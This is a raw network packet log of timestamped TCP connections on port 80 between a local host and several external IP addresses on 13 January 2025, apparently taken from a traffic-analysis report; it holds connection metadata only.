                                                                      Jan 13, 2025 09:39:50.404737949 CET8050014134.122.135.48192.168.2.4
                                                                      Jan 13, 2025 09:39:50.404747963 CET8050014134.122.135.48192.168.2.4
                                                                      Jan 13, 2025 09:39:50.404786110 CET8050014134.122.135.48192.168.2.4
                                                                      Jan 13, 2025 09:39:50.404794931 CET8050014134.122.135.48192.168.2.4
                                                                      Jan 13, 2025 09:39:50.404828072 CET8050014134.122.135.48192.168.2.4
                                                                      Jan 13, 2025 09:39:50.404990911 CET8050014134.122.135.48192.168.2.4
                                                                      Jan 13, 2025 09:39:50.404999018 CET8050014134.122.135.48192.168.2.4
                                                                      Jan 13, 2025 09:39:50.405006886 CET8050014134.122.135.48192.168.2.4
                                                                      Jan 13, 2025 09:39:50.405014992 CET8050014134.122.135.48192.168.2.4
                                                                      Jan 13, 2025 09:39:51.292751074 CET8050014134.122.135.48192.168.2.4
                                                                      Jan 13, 2025 09:39:51.292769909 CET8050014134.122.135.48192.168.2.4
                                                                      Jan 13, 2025 09:39:51.292840958 CET5001480192.168.2.4134.122.135.48
                                                                      Jan 13, 2025 09:39:51.913657904 CET5001480192.168.2.4134.122.135.48
                                                                      Jan 13, 2025 09:39:52.931210995 CET5001580192.168.2.4134.122.135.48
                                                                      Jan 13, 2025 09:39:52.936130047 CET8050015134.122.135.48192.168.2.4
                                                                      Jan 13, 2025 09:39:52.936228037 CET5001580192.168.2.4134.122.135.48
                                                                      Jan 13, 2025 09:39:52.946376085 CET5001580192.168.2.4134.122.135.48
                                                                      Jan 13, 2025 09:39:52.951447964 CET8050015134.122.135.48192.168.2.4
                                                                      Jan 13, 2025 09:39:53.823113918 CET8050015134.122.135.48192.168.2.4
                                                                      Jan 13, 2025 09:39:53.823272943 CET8050015134.122.135.48192.168.2.4
                                                                      Jan 13, 2025 09:39:53.823334932 CET5001580192.168.2.4134.122.135.48
                                                                      Jan 13, 2025 09:39:53.825941086 CET5001580192.168.2.4134.122.135.48
                                                                      Jan 13, 2025 09:39:53.830770969 CET8050015134.122.135.48192.168.2.4
                                                                      Jan 13, 2025 09:39:59.722731113 CET5001680192.168.2.4199.192.21.169
                                                                      Jan 13, 2025 09:39:59.727696896 CET8050016199.192.21.169192.168.2.4
                                                                      Jan 13, 2025 09:39:59.727785110 CET5001680192.168.2.4199.192.21.169
                                                                      Jan 13, 2025 09:39:59.746731997 CET5001680192.168.2.4199.192.21.169
                                                                      Jan 13, 2025 09:39:59.751746893 CET8050016199.192.21.169192.168.2.4
                                                                      Jan 13, 2025 09:40:00.327872038 CET8050016199.192.21.169192.168.2.4
                                                                      Jan 13, 2025 09:40:00.327915907 CET8050016199.192.21.169192.168.2.4
                                                                      Jan 13, 2025 09:40:00.335254908 CET5001680192.168.2.4199.192.21.169
                                                                      Jan 13, 2025 09:40:01.258780003 CET5001680192.168.2.4199.192.21.169
                                                                      Jan 13, 2025 09:40:02.274413109 CET5001780192.168.2.4199.192.21.169
                                                                      Jan 13, 2025 09:40:02.279512882 CET8050017199.192.21.169192.168.2.4
                                                                      Jan 13, 2025 09:40:02.279773951 CET5001780192.168.2.4199.192.21.169
                                                                      Jan 13, 2025 09:40:02.299962044 CET5001780192.168.2.4199.192.21.169
                                                                      Jan 13, 2025 09:40:02.305025101 CET8050017199.192.21.169192.168.2.4
                                                                      Jan 13, 2025 09:40:02.896920919 CET8050017199.192.21.169192.168.2.4
                                                                      Jan 13, 2025 09:40:02.896962881 CET8050017199.192.21.169192.168.2.4
                                                                      Jan 13, 2025 09:40:02.902076960 CET5001780192.168.2.4199.192.21.169
                                                                      Jan 13, 2025 09:40:03.802828074 CET5001780192.168.2.4199.192.21.169
                                                                      Jan 13, 2025 09:40:04.822838068 CET5001880192.168.2.4199.192.21.169
                                                                      Jan 13, 2025 09:40:04.827934980 CET8050018199.192.21.169192.168.2.4
                                                                      Jan 13, 2025 09:40:04.828052044 CET5001880192.168.2.4199.192.21.169
                                                                      Jan 13, 2025 09:40:04.843262911 CET5001880192.168.2.4199.192.21.169
                                                                      Jan 13, 2025 09:40:04.848885059 CET8050018199.192.21.169192.168.2.4
                                                                      Jan 13, 2025 09:40:04.848917007 CET8050018199.192.21.169192.168.2.4
                                                                      Jan 13, 2025 09:40:04.848943949 CET8050018199.192.21.169192.168.2.4
                                                                      Jan 13, 2025 09:40:04.848993063 CET8050018199.192.21.169192.168.2.4
                                                                      Jan 13, 2025 09:40:04.849020004 CET8050018199.192.21.169192.168.2.4
                                                                      Jan 13, 2025 09:40:04.849045992 CET8050018199.192.21.169192.168.2.4
                                                                      Jan 13, 2025 09:40:04.849071980 CET8050018199.192.21.169192.168.2.4
                                                                      Jan 13, 2025 09:40:04.849097967 CET8050018199.192.21.169192.168.2.4
                                                                      Jan 13, 2025 09:40:04.849128962 CET8050018199.192.21.169192.168.2.4
                                                                      Jan 13, 2025 09:40:05.471097946 CET8050018199.192.21.169192.168.2.4
                                                                      Jan 13, 2025 09:40:05.471358061 CET8050018199.192.21.169192.168.2.4
                                                                      Jan 13, 2025 09:40:05.471425056 CET5001880192.168.2.4199.192.21.169
                                                                      Jan 13, 2025 09:40:06.349589109 CET5001880192.168.2.4199.192.21.169
                                                                      Jan 13, 2025 09:40:07.368647099 CET5001980192.168.2.4199.192.21.169
                                                                      Jan 13, 2025 09:40:07.373531103 CET8050019199.192.21.169192.168.2.4
                                                                      Jan 13, 2025 09:40:07.373605967 CET5001980192.168.2.4199.192.21.169
                                                                      Jan 13, 2025 09:40:07.384577036 CET5001980192.168.2.4199.192.21.169
                                                                      Jan 13, 2025 09:40:07.389341116 CET8050019199.192.21.169192.168.2.4
                                                                      Jan 13, 2025 09:40:08.169625044 CET8050019199.192.21.169192.168.2.4
                                                                      Jan 13, 2025 09:40:08.169661999 CET8050019199.192.21.169192.168.2.4
                                                                      Jan 13, 2025 09:40:08.169675112 CET8050019199.192.21.169192.168.2.4
                                                                      Jan 13, 2025 09:40:08.169783115 CET5001980192.168.2.4199.192.21.169
                                                                      Jan 13, 2025 09:40:08.172987938 CET5001980192.168.2.4199.192.21.169
                                                                      Jan 13, 2025 09:40:08.177803993 CET8050019199.192.21.169192.168.2.4
                                                                      Jan 13, 2025 09:40:13.530220985 CET5002080192.168.2.4154.197.162.239
                                                                      Jan 13, 2025 09:40:13.535063982 CET8050020154.197.162.239192.168.2.4
                                                                      Jan 13, 2025 09:40:13.535136938 CET5002080192.168.2.4154.197.162.239
                                                                      Jan 13, 2025 09:40:13.554389000 CET5002080192.168.2.4154.197.162.239
                                                                      Jan 13, 2025 09:40:13.559286118 CET8050020154.197.162.239192.168.2.4
                                                                      Jan 13, 2025 09:40:14.129829884 CET8050020154.197.162.239192.168.2.4
                                                                      Jan 13, 2025 09:40:14.129903078 CET8050020154.197.162.239192.168.2.4
                                                                      Jan 13, 2025 09:40:14.130001068 CET5002080192.168.2.4154.197.162.239
                                                                      Jan 13, 2025 09:40:15.068541050 CET5002080192.168.2.4154.197.162.239
                                                                      Jan 13, 2025 09:40:16.113221884 CET5002180192.168.2.4154.197.162.239
                                                                      Jan 13, 2025 09:40:16.118129015 CET8050021154.197.162.239192.168.2.4
                                                                      Jan 13, 2025 09:40:16.118202925 CET5002180192.168.2.4154.197.162.239
                                                                      Jan 13, 2025 09:40:16.165165901 CET5002180192.168.2.4154.197.162.239
                                                                      Jan 13, 2025 09:40:16.170067072 CET8050021154.197.162.239192.168.2.4
                                                                      Jan 13, 2025 09:40:16.701747894 CET8050021154.197.162.239192.168.2.4
                                                                      Jan 13, 2025 09:40:16.701874971 CET8050021154.197.162.239192.168.2.4
                                                                      Jan 13, 2025 09:40:16.706928015 CET5002180192.168.2.4154.197.162.239
                                                                      Jan 13, 2025 09:40:17.677711964 CET5002180192.168.2.4154.197.162.239
                                                                      Jan 13, 2025 09:40:18.696822882 CET5002280192.168.2.4154.197.162.239
                                                                      Jan 13, 2025 09:40:18.701718092 CET8050022154.197.162.239192.168.2.4
                                                                      Jan 13, 2025 09:40:18.702183962 CET5002280192.168.2.4154.197.162.239
                                                                      Jan 13, 2025 09:40:18.720616102 CET5002280192.168.2.4154.197.162.239
                                                                      Jan 13, 2025 09:40:18.725642920 CET8050022154.197.162.239192.168.2.4
                                                                      Jan 13, 2025 09:40:18.725696087 CET8050022154.197.162.239192.168.2.4
                                                                      Jan 13, 2025 09:40:18.725749016 CET8050022154.197.162.239192.168.2.4
                                                                      Jan 13, 2025 09:40:18.725779057 CET8050022154.197.162.239192.168.2.4
                                                                      Jan 13, 2025 09:40:18.725807905 CET8050022154.197.162.239192.168.2.4
                                                                      Jan 13, 2025 09:40:18.725835085 CET8050022154.197.162.239192.168.2.4
                                                                      Jan 13, 2025 09:40:18.725887060 CET8050022154.197.162.239192.168.2.4
                                                                      Jan 13, 2025 09:40:18.725920916 CET8050022154.197.162.239192.168.2.4
                                                                      Jan 13, 2025 09:40:18.725929976 CET8050022154.197.162.239192.168.2.4
                                                                      Jan 13, 2025 09:40:19.375875950 CET8050022154.197.162.239192.168.2.4
                                                                      Jan 13, 2025 09:40:19.375907898 CET8050022154.197.162.239192.168.2.4
                                                                      Jan 13, 2025 09:40:19.375952005 CET5002280192.168.2.4154.197.162.239
                                                                      Jan 13, 2025 09:40:20.225527048 CET5002280192.168.2.4154.197.162.239
                                                                      Jan 13, 2025 09:40:21.244609118 CET5002380192.168.2.4154.197.162.239
                                                                      Jan 13, 2025 09:40:21.249409914 CET8050023154.197.162.239192.168.2.4
                                                                      Jan 13, 2025 09:40:21.250722885 CET5002380192.168.2.4154.197.162.239
                                                                      Jan 13, 2025 09:40:21.268678904 CET5002380192.168.2.4154.197.162.239
                                                                      Jan 13, 2025 09:40:21.273442984 CET8050023154.197.162.239192.168.2.4
                                                                      Jan 13, 2025 09:40:21.840183020 CET8050023154.197.162.239192.168.2.4
                                                                      Jan 13, 2025 09:40:21.840305090 CET8050023154.197.162.239192.168.2.4
                                                                      Jan 13, 2025 09:40:21.840342999 CET5002380192.168.2.4154.197.162.239
                                                                      Jan 13, 2025 09:40:21.843620062 CET5002380192.168.2.4154.197.162.239
                                                                      Jan 13, 2025 09:40:21.848460913 CET8050023154.197.162.239192.168.2.4
                                                                      Jan 13, 2025 09:40:26.906843901 CET5002480192.168.2.484.32.84.32
                                                                      Jan 13, 2025 09:40:26.911608934 CET805002484.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:40:26.911700964 CET5002480192.168.2.484.32.84.32
                                                                      Jan 13, 2025 09:40:26.925324917 CET5002480192.168.2.484.32.84.32
                                                                      Jan 13, 2025 09:40:26.930134058 CET805002484.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:40:27.386914015 CET805002484.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:40:27.386965990 CET5002480192.168.2.484.32.84.32
                                                                      Jan 13, 2025 09:40:28.427815914 CET5002480192.168.2.484.32.84.32
                                                                      Jan 13, 2025 09:40:28.432655096 CET805002484.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:40:29.446197987 CET5002580192.168.2.484.32.84.32
                                                                      Jan 13, 2025 09:40:29.451092958 CET805002584.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:40:29.451157093 CET5002580192.168.2.484.32.84.32
                                                                      Jan 13, 2025 09:40:29.467694044 CET5002580192.168.2.484.32.84.32
                                                                      Jan 13, 2025 09:40:29.472515106 CET805002584.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:40:29.912549019 CET805002584.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:40:29.912605047 CET5002580192.168.2.484.32.84.32
                                                                      Jan 13, 2025 09:40:30.975462914 CET5002580192.168.2.484.32.84.32
                                                                      Jan 13, 2025 09:40:30.993071079 CET805002584.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:40:31.994904995 CET5002680192.168.2.484.32.84.32
                                                                      Jan 13, 2025 09:40:32.000807047 CET805002684.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:40:32.000885010 CET5002680192.168.2.484.32.84.32
                                                                      Jan 13, 2025 09:40:32.020803928 CET5002680192.168.2.484.32.84.32
                                                                      Jan 13, 2025 09:40:32.025707960 CET805002684.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:40:32.025764942 CET805002684.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:40:32.025897980 CET805002684.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:40:32.025928020 CET805002684.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:40:32.025955915 CET805002684.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:40:32.025984049 CET805002684.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:40:32.026036978 CET805002684.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:40:32.026065111 CET805002684.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:40:32.026093006 CET805002684.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:40:32.466715097 CET805002684.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:40:32.466922998 CET5002680192.168.2.484.32.84.32
                                                                      Jan 13, 2025 09:40:33.537025928 CET5002680192.168.2.484.32.84.32
                                                                      Jan 13, 2025 09:40:33.541990995 CET805002684.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:40:34.611357927 CET5002780192.168.2.484.32.84.32
                                                                      Jan 13, 2025 09:40:34.616338015 CET805002784.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:40:34.616453886 CET5002780192.168.2.484.32.84.32
                                                                      Jan 13, 2025 09:40:34.681804895 CET5002780192.168.2.484.32.84.32
                                                                      Jan 13, 2025 09:40:34.686640024 CET805002784.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:40:35.082451105 CET805002784.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:40:35.082475901 CET805002784.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:40:35.082494974 CET805002784.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:40:35.082511902 CET805002784.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:40:35.082542896 CET805002784.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:40:35.082566023 CET805002784.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:40:35.082581997 CET805002784.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:40:35.082598925 CET805002784.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:40:35.082628965 CET805002784.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:40:35.082638979 CET805002784.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:40:35.082669020 CET5002780192.168.2.484.32.84.32
                                                                      Jan 13, 2025 09:40:35.082695961 CET5002780192.168.2.484.32.84.32
                                                                      Jan 13, 2025 09:40:35.082745075 CET5002780192.168.2.484.32.84.32
                                                                      Jan 13, 2025 09:40:35.082848072 CET805002784.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:40:35.083005905 CET5002780192.168.2.484.32.84.32
                                                                      Jan 13, 2025 09:40:35.089067936 CET5002780192.168.2.484.32.84.32
                                                                      Jan 13, 2025 09:40:35.093923092 CET805002784.32.84.32192.168.2.4
                                                                      Jan 13, 2025 09:40:40.615356922 CET5002880192.168.2.4134.122.135.48
                                                                      Jan 13, 2025 09:40:40.620209932 CET8050028134.122.135.48192.168.2.4
                                                                      Jan 13, 2025 09:40:40.620305061 CET5002880192.168.2.4134.122.135.48
                                                                      Jan 13, 2025 09:40:40.634567976 CET5002880192.168.2.4134.122.135.48
                                                                      Jan 13, 2025 09:40:40.639323950 CET8050028134.122.135.48192.168.2.4
                                                                      Jan 13, 2025 09:40:41.534905910 CET8050028134.122.135.48192.168.2.4
                                                                      Jan 13, 2025 09:40:41.535084009 CET8050028134.122.135.48192.168.2.4
                                                                      Jan 13, 2025 09:40:41.535136938 CET5002880192.168.2.4134.122.135.48
                                                                      Jan 13, 2025 09:40:42.146441936 CET5002880192.168.2.4134.122.135.48
                                                                      Jan 13, 2025 09:40:43.168612957 CET5002980192.168.2.4134.122.135.48
                                                                      Jan 13, 2025 09:40:43.173474073 CET8050029134.122.135.48192.168.2.4
                                                                      Jan 13, 2025 09:40:43.173563004 CET5002980192.168.2.4134.122.135.48
                                                                      Jan 13, 2025 09:40:43.188040972 CET5002980192.168.2.4134.122.135.48
                                                                      Jan 13, 2025 09:40:43.192873001 CET8050029134.122.135.48192.168.2.4
                                                                      Jan 13, 2025 09:40:44.068327904 CET8050029134.122.135.48192.168.2.4
                                                                      Jan 13, 2025 09:40:44.068342924 CET8050029134.122.135.48192.168.2.4
                                                                      Jan 13, 2025 09:40:44.068392992 CET5002980192.168.2.4134.122.135.48
                                                                      Jan 13, 2025 09:40:44.694839001 CET5002980192.168.2.4134.122.135.48
                                                                      Jan 13, 2025 09:40:45.712369919 CET5003080192.168.2.4134.122.135.48
                                                                      Jan 13, 2025 09:40:45.717365980 CET8050030134.122.135.48192.168.2.4
                                                                      Jan 13, 2025 09:40:45.717439890 CET5003080192.168.2.4134.122.135.48
                                                                      Jan 13, 2025 09:40:45.735991001 CET5003080192.168.2.4134.122.135.48
                                                                      Jan 13, 2025 09:40:45.740978003 CET8050030134.122.135.48192.168.2.4
                                                                      Jan 13, 2025 09:40:45.740999937 CET8050030134.122.135.48192.168.2.4
                                                                      Jan 13, 2025 09:40:45.741033077 CET8050030134.122.135.48192.168.2.4
                                                                      Jan 13, 2025 09:40:45.741054058 CET8050030134.122.135.48192.168.2.4
                                                                      Jan 13, 2025 09:40:45.741090059 CET8050030134.122.135.48192.168.2.4
                                                                      Jan 13, 2025 09:40:45.741156101 CET8050030134.122.135.48192.168.2.4
                                                                      Jan 13, 2025 09:40:45.741166115 CET8050030134.122.135.48192.168.2.4
                                                                      Jan 13, 2025 09:40:45.741231918 CET8050030134.122.135.48192.168.2.4
                                                                      Jan 13, 2025 09:40:45.741241932 CET8050030134.122.135.48192.168.2.4
                                                                      Jan 13, 2025 09:40:46.607937098 CET8050030134.122.135.48192.168.2.4
                                                                      Jan 13, 2025 09:40:46.607995987 CET8050030134.122.135.48192.168.2.4
                                                                      Jan 13, 2025 09:40:46.611427069 CET5003080192.168.2.4134.122.135.48
                                                                      Jan 13, 2025 09:40:47.240350008 CET5003080192.168.2.4134.122.135.48
                                                                      Jan 13, 2025 09:40:48.259418011 CET5003180192.168.2.4134.122.135.48
                                                                      Jan 13, 2025 09:40:48.264519930 CET8050031134.122.135.48192.168.2.4
                                                                      Jan 13, 2025 09:40:48.264600992 CET5003180192.168.2.4134.122.135.48
                                                                      Jan 13, 2025 09:40:48.279449940 CET5003180192.168.2.4134.122.135.48
                                                                      Jan 13, 2025 09:40:48.284396887 CET8050031134.122.135.48192.168.2.4
                                                                      Jan 13, 2025 09:40:49.173002005 CET8050031134.122.135.48192.168.2.4
                                                                      Jan 13, 2025 09:40:49.173064947 CET8050031134.122.135.48192.168.2.4
                                                                      Jan 13, 2025 09:40:49.173173904 CET5003180192.168.2.4134.122.135.48
                                                                      Jan 13, 2025 09:40:49.178570032 CET5003180192.168.2.4134.122.135.48
                                                                      Jan 13, 2025 09:40:49.183445930 CET8050031134.122.135.48192.168.2.4
                                                                      Jan 13, 2025 09:40:54.207962036 CET5003280192.168.2.447.83.1.90
                                                                      Jan 13, 2025 09:40:54.212899923 CET805003247.83.1.90192.168.2.4
                                                                      Jan 13, 2025 09:40:54.212976933 CET5003280192.168.2.447.83.1.90
                                                                      Jan 13, 2025 09:40:54.229907036 CET5003280192.168.2.447.83.1.90
                                                                      Jan 13, 2025 09:40:54.234792948 CET805003247.83.1.90192.168.2.4
                                                                      Jan 13, 2025 09:40:55.740150928 CET5003280192.168.2.447.83.1.90
                                                                      Jan 13, 2025 09:40:55.745476961 CET805003247.83.1.90192.168.2.4
                                                                      Jan 13, 2025 09:40:55.745553017 CET5003280192.168.2.447.83.1.90
                                                                      Jan 13, 2025 09:40:56.764378071 CET5003380192.168.2.447.83.1.90
                                                                      Jan 13, 2025 09:40:56.769459963 CET805003347.83.1.90192.168.2.4
                                                                      Jan 13, 2025 09:40:56.769587040 CET5003380192.168.2.447.83.1.90
                                                                      Jan 13, 2025 09:40:56.790559053 CET5003380192.168.2.447.83.1.90
                                                                      Jan 13, 2025 09:40:56.795458078 CET805003347.83.1.90192.168.2.4
                                                                      Jan 13, 2025 09:40:58.302766085 CET5003380192.168.2.447.83.1.90
                                                                      Jan 13, 2025 09:40:58.307977915 CET805003347.83.1.90192.168.2.4
                                                                      Jan 13, 2025 09:40:58.308041096 CET5003380192.168.2.447.83.1.90
                                                                      Jan 13, 2025 09:40:59.322694063 CET5003480192.168.2.447.83.1.90
                                                                      Jan 13, 2025 09:40:59.327732086 CET805003447.83.1.90192.168.2.4
                                                                      Jan 13, 2025 09:40:59.327841043 CET5003480192.168.2.447.83.1.90
                                                                      Jan 13, 2025 09:40:59.343803883 CET5003480192.168.2.447.83.1.90
                                                                      Jan 13, 2025 09:40:59.348743916 CET805003447.83.1.90192.168.2.4
                                                                      Jan 13, 2025 09:40:59.348804951 CET805003447.83.1.90192.168.2.4
                                                                      Jan 13, 2025 09:40:59.348834038 CET805003447.83.1.90192.168.2.4
                                                                      Jan 13, 2025 09:40:59.348912001 CET805003447.83.1.90192.168.2.4
                                                                      Jan 13, 2025 09:40:59.348938942 CET805003447.83.1.90192.168.2.4
                                                                      Jan 13, 2025 09:40:59.349091053 CET805003447.83.1.90192.168.2.4
                                                                      Jan 13, 2025 09:40:59.349118948 CET805003447.83.1.90192.168.2.4
                                                                      Jan 13, 2025 09:40:59.349169970 CET805003447.83.1.90192.168.2.4
                                                                      Jan 13, 2025 09:40:59.349196911 CET805003447.83.1.90192.168.2.4
                                                                      Jan 13, 2025 09:41:00.849556923 CET5003480192.168.2.447.83.1.90
                                                                      Jan 13, 2025 09:41:00.854954004 CET805003447.83.1.90192.168.2.4
                                                                      Jan 13, 2025 09:41:00.855108023 CET5003480192.168.2.447.83.1.90
                                                                      Jan 13, 2025 09:41:01.868946075 CET5003580192.168.2.447.83.1.90
                                                                      Jan 13, 2025 09:41:01.874135017 CET805003547.83.1.90192.168.2.4
                                                                      Jan 13, 2025 09:41:01.874228001 CET5003580192.168.2.447.83.1.90
                                                                      Jan 13, 2025 09:41:01.886828899 CET5003580192.168.2.447.83.1.90
                                                                      Jan 13, 2025 09:41:01.892187119 CET805003547.83.1.90192.168.2.4
                                                                      Jan 13, 2025 09:41:03.473222971 CET805003547.83.1.90192.168.2.4
                                                                      Jan 13, 2025 09:41:03.473347902 CET805003547.83.1.90192.168.2.4
                                                                      Jan 13, 2025 09:41:03.473516941 CET5003580192.168.2.447.83.1.90
                                                                      Jan 13, 2025 09:41:03.476458073 CET5003580192.168.2.447.83.1.90
                                                                      Jan 13, 2025 09:41:03.481352091 CET805003547.83.1.90192.168.2.4
                                                                      Jan 13, 2025 09:41:08.520235062 CET5003680192.168.2.4188.114.96.3
                                                                      Jan 13, 2025 09:41:08.525249958 CET8050036188.114.96.3192.168.2.4
                                                                      Jan 13, 2025 09:41:08.525351048 CET5003680192.168.2.4188.114.96.3
                                                                      Jan 13, 2025 09:41:08.542134047 CET5003680192.168.2.4188.114.96.3
                                                                      Jan 13, 2025 09:41:08.547014952 CET8050036188.114.96.3192.168.2.4
                                                                      Jan 13, 2025 09:41:09.054277897 CET8050036188.114.96.3192.168.2.4
                                                                      Jan 13, 2025 09:41:09.054305077 CET8050036188.114.96.3192.168.2.4
                                                                      Jan 13, 2025 09:41:09.054321051 CET8050036188.114.96.3192.168.2.4
                                                                      Jan 13, 2025 09:41:09.055377960 CET5003680192.168.2.4188.114.96.3
                                                                      Jan 13, 2025 09:41:10.052669048 CET5003680192.168.2.4188.114.96.3
                                                                      Jan 13, 2025 09:41:11.073115110 CET5003780192.168.2.4188.114.96.3
                                                                      Jan 13, 2025 09:41:11.078299999 CET8050037188.114.96.3192.168.2.4
                                                                      Jan 13, 2025 09:41:11.078476906 CET5003780192.168.2.4188.114.96.3
                                                                      Jan 13, 2025 09:41:11.096539021 CET5003780192.168.2.4188.114.96.3
                                                                      Jan 13, 2025 09:41:11.101438046 CET8050037188.114.96.3192.168.2.4
                                                                      Jan 13, 2025 09:41:11.603437901 CET8050037188.114.96.3192.168.2.4
                                                                      Jan 13, 2025 09:41:11.603498936 CET8050037188.114.96.3192.168.2.4
                                                                      Jan 13, 2025 09:41:11.603557110 CET5003780192.168.2.4188.114.96.3
                                                                      Jan 13, 2025 09:41:11.603832960 CET8050037188.114.96.3192.168.2.4
                                                                      Jan 13, 2025 09:41:11.603899956 CET5003780192.168.2.4188.114.96.3
                                                                      Jan 13, 2025 09:41:12.599566936 CET5003780192.168.2.4188.114.96.3
                                                                      Jan 13, 2025 09:41:13.626779079 CET5003880192.168.2.4188.114.96.3
                                                                      Jan 13, 2025 09:41:13.631699085 CET8050038188.114.96.3192.168.2.4
                                                                      Jan 13, 2025 09:41:13.631771088 CET5003880192.168.2.4188.114.96.3
                                                                      Jan 13, 2025 09:41:13.667427063 CET5003880192.168.2.4188.114.96.3
                                                                      Jan 13, 2025 09:41:13.810720921 CET8050038188.114.96.3192.168.2.4
                                                                      Jan 13, 2025 09:41:13.810993910 CET8050038188.114.96.3192.168.2.4
                                                                      Jan 13, 2025 09:41:13.811148882 CET8050038188.114.96.3192.168.2.4
                                                                      Jan 13, 2025 09:41:13.811346054 CET8050038188.114.96.3192.168.2.4
                                                                      Jan 13, 2025 09:41:13.811557055 CET8050038188.114.96.3192.168.2.4
                                                                      Jan 13, 2025 09:41:13.811778069 CET8050038188.114.96.3192.168.2.4
                                                                      Jan 13, 2025 09:41:13.812036991 CET8050038188.114.96.3192.168.2.4
                                                                      Jan 13, 2025 09:41:13.812217951 CET8050038188.114.96.3192.168.2.4
                                                                      Jan 13, 2025 09:41:13.812354088 CET8050038188.114.96.3192.168.2.4
                                                                      Jan 13, 2025 09:41:14.168010950 CET8050038188.114.96.3192.168.2.4
                                                                      Jan 13, 2025 09:41:14.168040991 CET8050038188.114.96.3192.168.2.4
                                                                      Jan 13, 2025 09:41:14.168092966 CET5003880192.168.2.4188.114.96.3
                                                                      Jan 13, 2025 09:41:14.168409109 CET8050038188.114.96.3192.168.2.4
                                                                      Jan 13, 2025 09:41:14.168467999 CET5003880192.168.2.4188.114.96.3
                                                                      Jan 13, 2025 09:41:15.180532932 CET5003880192.168.2.4188.114.96.3
                                                                      Jan 13, 2025 09:41:16.196778059 CET5003980192.168.2.4188.114.96.3
                                                                      Jan 13, 2025 09:41:16.201688051 CET8050039188.114.96.3192.168.2.4
                                                                      Jan 13, 2025 09:41:16.201834917 CET5003980192.168.2.4188.114.96.3
                                                                      Jan 13, 2025 09:41:16.211685896 CET5003980192.168.2.4188.114.96.3
                                                                      Jan 13, 2025 09:41:16.216603041 CET8050039188.114.96.3192.168.2.4
                                                                      Jan 13, 2025 09:41:16.710911989 CET8050039188.114.96.3192.168.2.4
                                                                      Jan 13, 2025 09:41:16.712176085 CET8050039188.114.96.3192.168.2.4
                                                                      Jan 13, 2025 09:41:16.715404034 CET5003980192.168.2.4188.114.96.3
                                                                      Jan 13, 2025 09:41:16.718230963 CET5003980192.168.2.4188.114.96.3
                                                                      Jan 13, 2025 09:41:16.723129034 CET8050039188.114.96.3192.168.2.4
                                                                      Jan 13, 2025 09:41:29.860168934 CET5004080192.168.2.4199.59.243.228
                                                                      Jan 13, 2025 09:41:29.865403891 CET8050040199.59.243.228192.168.2.4
                                                                      Jan 13, 2025 09:41:29.865490913 CET5004080192.168.2.4199.59.243.228
                                                                      Jan 13, 2025 09:41:29.888696909 CET5004080192.168.2.4199.59.243.228
                                                                      Jan 13, 2025 09:41:29.893615961 CET8050040199.59.243.228192.168.2.4
                                                                      Jan 13, 2025 09:41:30.343450069 CET8050040199.59.243.228192.168.2.4
                                                                      Jan 13, 2025 09:41:30.343492031 CET8050040199.59.243.228192.168.2.4
                                                                      Jan 13, 2025 09:41:30.343528032 CET8050040199.59.243.228192.168.2.4
                                                                      Jan 13, 2025 09:41:30.343662977 CET5004080192.168.2.4199.59.243.228
                                                                      Jan 13, 2025 09:41:30.343775034 CET5004080192.168.2.4199.59.243.228
                                                                      Jan 13, 2025 09:41:31.396452904 CET5004080192.168.2.4199.59.243.228
                                                                      Jan 13, 2025 09:41:32.415803909 CET5004180192.168.2.4199.59.243.228
                                                                      Jan 13, 2025 09:41:32.421499014 CET8050041199.59.243.228192.168.2.4
                                                                      Jan 13, 2025 09:41:32.421583891 CET5004180192.168.2.4199.59.243.228
                                                                      Jan 13, 2025 09:41:32.439866066 CET5004180192.168.2.4199.59.243.228
                                                                      Jan 13, 2025 09:41:32.447029114 CET8050041199.59.243.228192.168.2.4
                                                                      Jan 13, 2025 09:41:32.879940987 CET8050041199.59.243.228192.168.2.4
                                                                      Jan 13, 2025 09:41:32.879978895 CET8050041199.59.243.228192.168.2.4
                                                                      Jan 13, 2025 09:41:32.880013943 CET8050041199.59.243.228192.168.2.4
                                                                      Jan 13, 2025 09:41:32.880045891 CET5004180192.168.2.4199.59.243.228
                                                                      Jan 13, 2025 09:41:32.880103111 CET5004180192.168.2.4199.59.243.228
                                                                      Jan 13, 2025 09:41:33.943327904 CET5004180192.168.2.4199.59.243.228
                                                                      Jan 13, 2025 09:41:34.963361025 CET5004280192.168.2.4199.59.243.228
                                                                      Jan 13, 2025 09:41:34.968450069 CET8050042199.59.243.228192.168.2.4
                                                                      Jan 13, 2025 09:41:34.968602896 CET5004280192.168.2.4199.59.243.228
                                                                      Jan 13, 2025 09:41:34.984188080 CET5004280192.168.2.4199.59.243.228
                                                                      Jan 13, 2025 09:41:34.989137888 CET8050042199.59.243.228192.168.2.4
